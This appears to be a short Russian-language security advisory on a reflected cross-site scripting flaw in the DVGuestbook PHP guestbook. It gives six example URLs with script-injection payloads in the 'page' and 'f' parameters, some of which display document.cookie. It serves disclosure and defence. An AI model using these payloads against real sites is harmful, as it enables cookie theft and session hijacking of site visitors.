Программа: DVGuestbookV2.0 1.2.2 и 1.6, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "page"
сценария "index.php". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта. Удачная эксплуатация уязвимости требует,
чтобы опция "register_globals" была включена.

Пример:

DVguestbook 1.0 Xss

http://victim/path/dv_gbook.php?d=0&f=’"><script>alert(document.cookie)</script>
http://victim/path/dv_gbook.php?d=0&f=’"><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/dv_gbook.php?d=0&f=’"><script>alert(document.domain)</script>

DVguestbook 1.2.2 Xss

http://victim/path/index.php?page="><script>alert(document.cookie)</script>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</script>
 



Оставить мнение